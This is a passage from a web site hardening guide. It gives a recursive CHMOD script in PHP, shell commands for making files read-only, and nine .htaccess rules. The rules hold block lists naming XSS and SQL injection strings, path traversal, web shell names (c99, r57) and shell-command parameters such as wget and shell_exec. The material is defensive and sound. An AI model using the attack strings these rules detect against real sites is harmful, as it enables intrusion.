    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;td&gt;&quot;</span><span style="color: #666666">.</span>ABSPATH<span style="color: #666666">.</span><span style="color: #BA2121">&quot; &lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">text</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> name=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">chemin</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> maxlength=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">80</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> size=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">30</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">/</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> &gt;&lt;/td&gt;&lt;/tr&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt; &lt;/td&gt;&lt;td&gt;&lt;strong style=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">color:red</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;CAUTION: MODIFICATIONS INCLUDE CHILDREN&#39;S FOLDERS AND THEIR FILES.&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;tr&gt;&lt;td&gt; &lt;/td&gt;&lt;td&gt;&lt;input type=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">submit</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> value=</span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121"> Change CHMODs of Folders and Files </span><span style="color: #BB6622; font-weight: bold">\&quot;</span><span style="color: #BA2121">&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;/form&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&quot;</span>;

<span style="color: #008000; font-weight: bold">if</span> ( (<span style="color: #19177C">$dosPerm</span><span style="color: #666666">||</span><span style="color: #19177C">$ficPerm</span>) <span style="color: #666666">&gt;</span> <span style="color: #666666">0</span> ){

    <span style="color: #008000; font-weight: bold">function</span> <span style="color: #0000FF">rChmod</span>(<span style="color: #19177C">$chem</span>,<span style="color: #19177C">$dosPerm</span>,<span style="color: #19177C">$ficPerm</span>) {
        <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;p&gt;&lt;b&gt;Log:&lt;/b&gt;&lt;/p&gt;</span><span style="color: #BB6622; font-weight: bold">\r\n</span><span style="color: #BA2121">&quot;</span>;

        <span style="color: #19177C">$d</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">new</span> RecursiveDirectoryIterator(<span style="color: #19177C">$chem</span>, FilesystemIterator<span style="color: #666666">::</span><span style="color: #7D9029">SKIP_DOTS</span>);
        <span style="color: #008000; font-weight: bold">foreach</span> (<span style="color: #008000; font-weight: bold">new</span> RecursiveIteratorIterator(<span style="color: #19177C">$d</span>, <span style="color: #666666">1</span>) <span style="color: #008000; font-weight: bold">as</span> <span style="color: #19177C">$path</span>) {
            <span style="color: #19177C">$chmodret</span> <span style="color: #666666">=</span> <span style="color: #008000; font-weight: bold">false</span>;
            <span style="color: #19177C">$chmodresultat</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;&quot;</span>;
            <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #19177C">$path</span><span style="color: #666666">-&gt;</span><span style="color: #7D9029">isDir</span>() ) {
            <span style="color: #19177C">$chmodret</span> <span style="color: #666666">=</span> <span style="color: #008000">chmod</span>( <span style="color: #19177C">$path</span>, <span style="color: #19177C">$dosPerm</span> ); }
            <span style="color: #008000; font-weight: bold">else</span> {
            <span style="color: #008000; font-weight: bold">if</span> ( <span style="color: #008000">is_file</span>( <span style="color: #19177C">$path</span> )  ) {
            <span style="color: #19177C">$chmodret</span> <span style="color: #666666">=</span> <span style="color: #008000">chmod</span>( <span style="color: #19177C">$path</span>, <span style="color: #19177C">$ficPerm</span> ); }
            }
            <span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$chmodret</span>) {<span style="color: #19177C">$chmodresultat</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;OK&quot;</span>; }
            <span style="color: #008000; font-weight: bold">else</span> {
                <span style="color: #19177C">$chmodresultat</span> <span style="color: #666666">=</span> <span style="color: #BA2121">&quot;ERROR&quot;</span>;
                <span style="color: #666666">++</span><span style="color: #19177C">$retval</span>;
                }
            <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #19177C">$chmodresultat</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot; &quot;</span> <span style="color: #666666">.</span> <span style="color: #19177C">$path</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot;&lt;br /&gt;</span><span style="color: #BB6622; font-weight: bold">\r\n</span><span style="color: #BA2121">&quot;</span>;
        }
    <span style="color: #008000; font-weight: bold">return</span> <span style="color: #19177C">$retval</span>;
    }
    <span style="color: #19177C">$nbfailed</span> <span style="color: #666666">=</span> rChmod(<span style="color: #19177C">$chem</span>,<span style="color: #19177C">$dosPerm</span>,<span style="color: #19177C">$ficPerm</span>);
    <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;&lt;p&gt;&lt;b&gt;&quot;</span>;
    <span style="color: #008000; font-weight: bold">if</span> (<span style="color: #19177C">$nbfailed</span> <span style="color: #666666">&gt;</span> <span style="color: #666666">0</span>) {
        <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #19177C">$nbfailed</span> <span style="color: #666666">.</span> <span style="color: #BA2121">&quot; error(s) CHMOD. See the log above.&quot;</span>;
        }
    <span style="color: #008000; font-weight: bold">else</span> <span style="color: #008000; font-weight: bold">echo</span> <span style="color: #BA2121">&quot;No apparent error. Check for yourself.&lt;/b&gt; Delete the file after use.&lt;/p&gt;</span><span style="color: #BB6622; font-weight: bold">\r\n</span><span style="color: #BA2121">&quot;</span>;
}
    <span style="color: #008000; font-weight: bold">print</span> <span style="color: #BA2121">&quot;&lt;/body&gt;&lt;/html&gt;&quot;</span>;
<span style="color: #BC7A00">?&gt;</span>
</pre></div>
						<p>It is possible to speed up the change of permission with SSH by automating this action. Your webhost must give you access to an SSH connection.<br>
						With a script that does <a href="http://sourceforge.net/projects/shcmd/">pseudo-ssh in PHP</a>, put the file in the “www” or “public_html” folder and start working.<br>
						Changing all permissions via FTP of all files and folders can be time consuming and tedious with the risk of forgetting some of them. I use the command lines below to quickly change permission via SSH.</p>
						<p>Login to your account using SSH, then go to the “www” (or “public_html”) folder by entering the cd command www , and enter the following commands in a single line (after modifying the names of files and folders as needed):<br>
						In SSH mode, put yourself in the “www” or “public_html” directory before starting.<br>
						Copy one line, press the Enter key, and copy another line, press the Enter key, etc. after changing the names of the files and folders as needed.</p>
						<p>All files have 404 or 444 permission (<em>read permission, no write permission</em>):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">find . -type f -print0 | xargs -0 chmod 404</pre>
<p>All folders have the permissions 505 or 555 (<em>read permission, no write permission).</em>):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">find . -type d -print0 | xargs -0 chmod 505</pre>
<p>All files with the name “.htaccess” have 404 or 444 permission (<em>read permission, no write permission, etc.).</em>):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">find . -type f -name .htaccess -print0 | xargs -0 chmod 404</pre>
<p>All files containing the name “config*.php” (use of the wildcard character *) in the “blog” folder have 404 rights (<em>read permission, no write permission</em>):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">find /home/loginftp/www/blog -type f -name &quot;config*.php&quot; -print0 | xargs -0 chmod 404</pre>
<p>All php files (“*.php” using the wildcard character *) have permissions 404 or 444 (<em>right to read, no right to write</em>):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">find . -type f -name &quot;*.php&quot; -print0 | xargs -0 chmod 404</pre>
<p>All folders with the name “folder_to_lock” have the permission 505 or 555 (<em>read permission, no write permission, etc.</em>):</p> 
<span class="smallfont">Code:</span>
<pre class="smallfont code">find . -type d -name folder_to_lock -print0 | xargs -0 chmod 505</pre>
<p>All folders that contain the word upload, such as “123-upload” or “uploadthing” (“*upload*” using the wildcard character *) that are located in the folder “forum” have permission 705 (<em> read and write permission for you and the server</em>):</p>
<span class="smallfont">Code:</span>
<pre class="smallfont code">find /home/loginftp/www/forum -type d -name &quot;*upload*&quot; -print0 | xargs -0 chmod 705</pre>
<p><a href="https://en.wikipedia.org/wiki/Chmod">An article on the meaning of CHMOD and the meaning of numbers.</a></p>
						<a id="htaccess"></a><hr><br>
						<header>
							<h2>The .htaccess file</h2>
						</header>
						<p>I present 9 tips to secure your website. They are very effective and stop many hacking attempts <strong>before</strong> your CMS, blog or e-commerce takes action. So, to some extent, if your software has a flaw, maybe these rules will prevent it from being exploited. Don't install these rules all at once, follow the installation and testing guidelines after Tip #9. <strong>Apply at least rules 3, 4, 5 and 6 which are very effective</strong>, they will protect you from 90% of automatic attacks with little risk of blocking your website.</p>
						<p>Create the .htaccess file with a plain text program (anything but Word). Call it “txt.htaccess”, send it by FTP to your www folder and rename it to “.htaccess”. If the file already exists, add the rules described below after the text. Then FTP it with the permission 404 or 444. It will not be editable.</p>
						<p>Here is a series of commands to secure your website.</p>
						<p><strong>1-</strong> Prohibit access to this file from a web browser:</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #008000; font-weight: bold">&lt;Files</span> <span style="color: #BA2121">.htaccess</span><span style="color: #008000; font-weight: bold">&gt;</span>
<span style="color: #008000">order</span> allow,deny
<span style="color: #008000">deny</span> from <span style="color: #008000; font-weight: bold">all</span>
<span style="color: #008000; font-weight: bold">&lt;/Files&gt;</span>
</pre></div>
						<p><strong>2-</strong> Prohibit listing the contents of a folder:</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #008000">Options</span> -Indexes
</pre></div>
						<p><strong>3-</strong> We are blocking a whole series of potential vulnerabilities. Most hackers use these means to test the weakness of your site. Here, we block them before they penetrate your CMS, blog or e-commerce. <strong class="vert">-= HIGHLY EFFECTIVE AND ESSENTIAL =-</strong></p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### FILTER AGAINST XSS, HTTP REDIRECT, base64_encode, PHP GLOBALS VARIABLE VIA URL, CHANGE VARIABLE _REQUEST VIA URL, TEST PHP WEAKNESS, SIMPLE INJECTION SQL</span>
<span style="color: #008000">RewriteEngine</span> <span style="color: #008000; font-weight: bold">On</span>
<span style="color: #008000">RewriteCond</span> %{REQUEST_METHOD} (GET|POST) [NC]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)(%3C|&lt;)/?(no)?script(.*)$ [NC,OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)(%3D|=)?javascript(%3A|:)(.*)$ [NC,OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)document\.location\.href(.*)$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^.*(%24&amp;x).* [NC,OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^.*(127\.0).* [NC,OR]
<span style="color: #408080; font-style: italic">## WATCH OUT FOR THIS RULE. IT CAN BREAK SOME REDIRECTIONS THAT LOOK LIKE À: http://www.thing.com/index.php?r=http://www.bit.com</span>
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)(%3D|=|%2B|\+)(%27|&#39;|%22|\&quot;)?(https?|ftp|mosConfig)(%3A|:)(%2F%2F|//)(.*)$ [NC,OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^.*(_encode|localhost|loopback).* [NC,OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^author=[1-9] [NC,OR] ## recherche page auteur Wordpress pour deviner le login
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)(GLOBALS|_REQUEST|DOCUMENT_ROOT|_SERVER|_POST)(=|\[|%[0-9A-Z]{0,2})(.*)$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)(SELECT(%20|\+)|UNION(%20|\+)ALL|INSERT(%20|\+)|DELETE(%20|\+)|CHAR\(|UPDATE(%20|\+)|REPLACE(%20|\+)|LIMIT(%20|\+)|CONCAT(%20|\+)|DECLARE(%20|\+))(.*)$ [NC]
<span style="color: #008000">RewriteRule</span> (.*) - [F]
</pre></div>
						<p><strong>4-</strong> We are blocking some weird requests: <strong class="vert">-= HIGHLY EFFECTIVE AND ESSENTIAL =-</strong></p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### FAKE URLS OR OLD OBSOLETE SYSTEMS OR DEFAULT URLS TO AVOID, WE NEUTRALIZE THEM.</span>
<span style="color: #008000">RewriteRule</span> &quot;(base64|boot\.ini|eval\(|\(null\)|^[-_a-z0-9/\.]*//.*|etc(%2F|/)passwd|(%3D|=)\.\./\.\./|^_vti.*|^MSOffice.*|fckeditor/|elfinder/|^simpla/|zoho/|jquery-file-upload/server/|/assetmanager/|wwwroot|e107\_|^netcat/|^indy/|^etm/|^static/|^downloader/|trackback|^pma/|phpmyadmin/|^(my?)sql\.|^dump\.|^db\.|^database\.|^backups?\.|^httpdoc\.|^public_html\.|^old[-_]\.|^pack\.|^iismap\.)&quot; - [NC,F]
<span style="color: #408080; font-style: italic">### DISABLE QUERY METHODS DELETE, PUT, PATCH OF WEBDAV</span>
<span style="color: #008000">RewriteCond</span> %{REQUEST_METHOD} ^(DELETE|PUT|PATCH) [NC,F]
</pre></div>
						<p><strong>5-</strong> Some files are only allowed to be displayed, others are not. The index.php file is the default file. If we display index.htm, it doesn't work. The purpose is to prohibit the pirate to display on his browser a file or a file format that is not authorized. <strong class="vert">-= <u>VERY</u> <u>VERY</u> <u>VERY</u> EFFECTIVE BUT TO BE TESTED AND ADAPTED TO YOUR INSTALLATION =-</strong><br>
						Caution: these prohibitions must be tested and adapted if necessary.</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### ONLY THE index.php FILE IS SERVICED AS THE FIRST FILE BY DEFAULT. THE OTHERS ARE FORBIDDEN</span>
<span style="color: #008000">DirectoryIndex</span> index.php
<span style="color: #008000">RewriteEngine</span> <span style="color: #008000; font-weight: bold">On</span>

<span style="color: #408080; font-style: italic">### PROHIBIT OTHER INDEX FILE TYPES</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;^(index)\.(p?s?x?htm?|txt|aspx?|cfml?|cgi|pl|php[3-9]|jsp|xml)$&quot;</span> - [NC,F]

<span style="color: #408080; font-style: italic">### DISALLOW THE DISPLAY OF CERTAIN FILE FORMATS EXECUTED BY THE SERVER </span>
<span style="color: #408080; font-style: italic">### BUT NOT ALLOWED TO BE DISPLAYED BY THE WEB BROWSER</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;(\.(aspx?|backup|bak|bash|bat|bin|bkp|c|cfg|class|cmd|com|conf|config|cvs|cxz|dat|db|dist|dll|dos|env|exe|fla|git|h|hg|inc|ini|jsp|key|lnk|log|mdb|module|mso|old|pass|pdb|pl|pol|printer|psd|pwd|py|rar|resources|sh|spd|sql|svn|sw[op]|sys|theme|tpl|webinfo)|~)$&quot;</span> - [NC,F]

<span style="color: #408080; font-style: italic">### PROHIBIT ACCESS TO CERTAIN FOLDERS BY THE WEB BROWSER </span>
<span style="color: #408080; font-style: italic">### BUT AUTHORIZED AND EXECUTED BY THE SERVER</span>
<span style="color: #408080; font-style: italic">### TO BE ADAPTED IF THIS IS A PROBLEM</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;(\.svn|\.git|\.hg|\.bzr|\.env|\.cvs|\.ssh|install?|users?|modules|node|core|config(ure|uration)?|options?|settings?|functions?|setup|[-_a-z0-9.]*cms[-_a-z0-9.]*|[-_a-z0-9.]*php[-_a-z0-9.]*|null|^root|^logs?)/.*&quot;</span> - [NC,F]

<span style="color: #408080; font-style: italic">### PROHIBIT THE DISPLAY OF CERTAIN FILES SUCH AS readme, changelog, default, xmlrpc. </span>
<span style="color: #408080; font-style: italic">### THESE FILES GIVE VALUABLE INFORMATION ABOUT THE INSTALLED CONFIGURATION (SERVER NAME AND VERSION NUMBER). </span>
<span style="color: #408080; font-style: italic">### TO BE ADAPTED IF THIS IS A PROBLEM</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;(readme|changelog|license|default|home|xmlrpc|local|errors?|debug|hacke?r?d?|php|shell|ssh|roots?|cmd|null|test|data)\.(p?s?x?htm?l?|txt|md|log|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml)$&quot;</span> - [NC,F]

<span style="color: #408080; font-style: italic">### PROTECTION OF UNSECURED AND UNAUTHORIZED SFTP SYNCHRONIZATION ACCESS FROM A WEB BROWSER</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;\.?(s?ftp|remote|deployment|ws_ftp|winscp|filezilla|webservers)-?(config|sync)?\.(json|settings?|ini|xml)$&quot;</span> - [NC,F]
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;(\.ssh/)?(id_[rdec1259]+sa)$&quot;</span> - [NC,F]

<span style="color: #408080; font-style: italic">### IF YOU DON'T USE CMS, YOU CAN ADD THE CODE BELOW, </span>
<span style="color: #408080; font-style: italic">### OR GET SOME IDEAS ON HOW TO LOCK YOUR CMS EVEN BETTER.</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;(install?|users?|upload(er)?|regist(er|ration)|config(\.inc|ure|uration)?|options?(\.inc)?|settings?(\.inc)?|functions?(\.inc)?|setup(\.inc)?)\.(p?s?x?htm?l?|css|txt|md|log|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?)$&quot;</span> - [NC,F]

<span style="color: #408080; font-style: italic">### FORBID ACCESS TO THE INTERFACES OF WORDPRESS ADMINISTRATION OR OTHER CMS</span>
<span style="color: #408080; font-style: italic">### WITH A CLASSIC DEFAULT ACCESS THAT CAN EASILY BE GUESSED LIKE login or wp-login, admin, manager, etc.</span>
<span style="color: #408080; font-style: italic">### OR GET SOME IDEAS ON HOW TO LOCK YOUR CMS EVEN BETTER.</span>
<span style="color: #008000">RewriteRule</span> <span style="color: #BA2121">&quot;(wp-?|wordpress|login|(my)?admin(istrator)?(zone)?|blog/|^modules|^manager)&quot;</span> - [NC,F]
</pre></div>
						<p><strong>6-</strong> Prevent the execution of any PHP, Perl, CGI script in a directory. The option below allows you for example to protect an upload folder or any very sensitive folder that you want to make more secure. Do not use this option in the .htaccess file with all the codes described above. Instead, I invite you to create an .htaccess file and put it in the folder you want to protect. This option prevents a web browser from executing the script directly. But if the browser opens the index.php file that makes an include() to a php file in the folder protected by the code below, everything will run fine. This protects the direct execution of the file by a browser when the cracker tries to enter unfiltered malicious code. <strong class="vert">-= HIGHLY EFFECTIVE AND ESSENTIAL =-</strong></p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### No script in the directory and its subdirectories, whether PHP, PERL or other CGI, will be able to run if ExecCGI is inactive. And it is forbidden to display the list of files.</span>
<span style="color: #008000">OPTIONS</span> -ExecCGI  -Indexes
</pre></div>
						<p><strong>7-</strong> Exclude suspicious software used by hackers and some web site suckers. Apply this rule without too much risk, as it blocks some automatic attacks. This list is the minimum. You can add other if you find any. However, it is not as effective as it used to be because now all hacker robots use fake identities. We block the dumbest ones here.</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### FILTER AGAINST SOME OF THE HACKERS' ROBOTS</span>
<span style="color: #008000">RewriteEngine</span> <span style="color: #008000; font-weight: bold">On</span>
<span style="color: #408080; font-style: italic">## EXCEPTION: ALL ROBOTS, EVEN ANONYMOUS OR BANNED ONES, CAN ACCESS THESE FILES.</span>
<span style="color: #008000">RewriteCond</span> %{REQUEST_URI} !^robots.txt
<span style="color: #008000">RewriteCond</span> %{REQUEST_URI} !^sitemap.xml
<span style="color: #408080; font-style: italic">## ANONYMES</span>
<span style="color: #008000">RewriteCond</span> %{HTTP_USER_AGENT} ^-?$ [OR]
<span style="color: #408080; font-style: italic">## LIBRARIES / HTTP CLASSES WE DON'T WANT. BE CAREFUL, THIS CAN BLOCK SOME FUNCTIONS OF YOUR CMS. DO NOT DELETE EVERYTHING, BUT LOOK FOR THE NAME OF THE HTTP CLASS CONCERNED (ASK THE DEVELOPERS OF YOUR CMS). THIS LIST BLOCKS 80% OF SPAMBOTS. YOU MUST KEEP IT.</span>
<span style="color: #008000">RewriteCond</span> %{HTTP_USER_AGENT} ^curl|^Fetch\ API\ Request|GT::WWW|^HTTP::Lite|httplib|^Java|^LeechFTP|lwp-trivial|^LWP|libWeb|libwww|^PEAR|PECL::HTTP|PHPCrawl|PycURL|^ReGet|Rsync|Snoopy|URI::Fetch|urllib|WebDAV|^Wget|^AnyConnect|Nmap\ Scripting [NC]
<span style="color: #408080; font-style: italic">## THOSE WHO INVENT NAMES AT RANDOM, REMOVE THE 2 HASH KEYS AT THE BEGINNING OF THE LINE TO ACTIVATE IT.</span>
<span style="color: #408080; font-style: italic">## RewriteCond %{HTTP_USER_AGENT} ^[bcdfghjklmnpqrstvwxz\ ]{10,}|^[0-9a-z]{15,}|^[0-9A-Za-z]{19,}|^[A-Za-z]{3,}\ [a-z]{4,}\ [a-z]{4,} [OR]</span>
<span style="color: #008000">RewriteRule</span> (.*) [F]
</pre></div>
						<p><strong>8-</strong> No hotlinking. Replace <em>mydomain</em> by your domain name, and <em>\.fr</em> by fr, com, net, org or other extensions, keeping the \ before the dot.</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### AVOID THE THEFT OF IMAGES, VIDEO, SOUND, STYLE SHEET, PDF AND ZIP</span>
<span style="color: #408080; font-style: italic">### VISITORS MUST PASS THROUGH THE SITE. </span>
<span style="color: #008000">RewriteEngine</span> <span style="color: #008000; font-weight: bold">on</span> 
<span style="color: #008000">RewriteCond</span> %{HTTP_REFERER} !^$ 
<span style="color: #008000">RewriteCond</span> %{HTTP_REFERER} !^https?://[-a-z0-9.]*mydomain\.fr$ [NC] 
<span style="color: #008000">RewriteCond</span> %{HTTP_REFERER} !^https?://[-a-z0-9.]*mydomain\.fr/.*$ [NC] 
<span style="color: #408080; font-style: italic">## THESE DOMAINS MAY DISPLAY THE SITE ITEMS</span>
<span style="color: #008000">RewriteCond</span> %{HTTP_REFERER} !^https?://.*(translate|paypal|google|bing|yahoo|yandex|baidu|facebook|qwant|duck|ixquick|pinterest|twitter).*$ [NC]
<span style="color: #408080; font-style: italic">## CONNECTIONS THROUGH MOBILE APPS CAN DISPLAY THE ELEMENTS OF THE SITE</span>
<span style="color: #008000">RewriteCond</span> %{HTTP_REFERER} !^mobile?://.*$ [NC]
<span style="color: #008000">RewriteRule</span> .*\.(gif|jpe?g?|jp2|png|svgz?|css|pdf|zip|gz|js|mp3|m4a|mp4|mov|divx|avi|wma?v?|wmp|swf|flv|docx?|xlsx?|pptx?|vbs|rtf|asf?x?|odt|ods|odp|odg|odb|eot|ttf|woff|woff2)$ [NC,F]
</pre></div>
						<p><strong>9-</strong> If hackers have managed to penetrate your site, they install a script that allows them to take control of your hosting. Here, most of the commands of these scripts are blocked. To be tested with your website because it is very powerful and efficient. On the 5th line, replace “/home/loginftp/” by your absolute file path before the “www” or “public_html” folder. <strong>This rule is very effective but can break your CMS, blog or e-commerce.</strong> Use it last, then test it intensely, and eventually delete the rule that causes the problem.</p>
<span class="smallfont">Code:</span>
<!-- HTML generated using hilite.me --><div class="smallfont code" style="overflow:auto;width:auto;padding:.2em .6em;"><pre style="margin: 0; line-height: 125%"><span style="color: #408080; font-style: italic">### FILTER AGAINST PHPSHELL.PHP, REMOTEVIEW, C99SHELL AND OTHERS AUTRES</span>
<span style="color: #008000">RewriteEngine</span> <span style="color: #008000; font-weight: bold">On</span>
<span style="color: #008000">RewriteCond</span> %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
<span style="color: #008000">RewriteCond</span> %{REQUEST_METHOD} (GET|POST) [NC]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)=/home/loginftp/(.*)$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^work_dir=.*$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^command=.*&amp;amp;output.*$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
<span style="color: #408080; font-style: italic">## WATCH OUT FOR THIS RULE. IT CAN BREAK YOUR SITE</span>
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)cmd=.*$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&amp;amp;f=.*))$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&amp;amp;d=.*$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^&amp;amp;?c=(l?v?i?&amp;amp;d=|v&amp;amp;fnot=|setup&amp;amp;ref=|l&amp;amp;r=|d&amp;amp;d=|tree&amp;amp;d|t&amp;amp;d=|e&amp;amp;d=|i&amp;amp;d=|codes|md5crack).*$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|concat|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
<span style="color: #008000">RewriteCond</span> %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
<span style="color: #008000">RewriteRule</span> (.*) [F]
</pre></div>
						<p><strong>Don't set these rules all at once.</strong><br>
						Copy one, then test your CMS, blog or e-commerce by adding, modifying a page, add or delete a user, access your administration interface and do several things. If everything is OK, put another rule. In case of a problem, look at the URL called. There may be a keyword that is blocked by the .htaccess file. You will have to delete this keyword from the .htaccess file. You understood it, this system filters the URL and looks if it is in accordance with a normal use. So, if you get an error message, find the keyword that blocks the request.<br>
						You have to adapt these rules to your case, it is not a simple copy and paste.</p>
						<p>Later, when using your CMS, blog or e-commerce, you see a 403 error, then it is likely that a filtering rule is active.</p>
						<p>Finally, your CMS, blog or e-commerce often uses the .htaccess file to include more readable URL rewriting rules. Set the hacker filters first and the URL rewriting rules at the end. This is because the filters apply from the first to the last. Placing the anti-hacker filters after the URL rewriting rules of your CMS, blog or e-commerce would not bring any benefit (this is not 100% true, but there are reasons).</p>
						<a id="fichmodif"></a><hr><br>
						<header>
							<h2>Have the list of modified and added files</h2>
						</header>
						<p>Here is a small php script that allows you to have a list of the last files created <strong>AND</strong> modified.</p>
						<p>If you have been hacked, you will find out which files have been added and which ones have been modified by the hacker with the date and time. So, by comparing the date of these modified files to the logs, you will know if the editing is normal or not and you will know when and how the hacker hit.</p>
						<p>It is also used to understand the behaviour of a script or a CMS, blog, wiki and see which files have been manipulated by this software.</p>
						<p>Copy the code below and create a text file that you can call for example: list-modif.php<br>
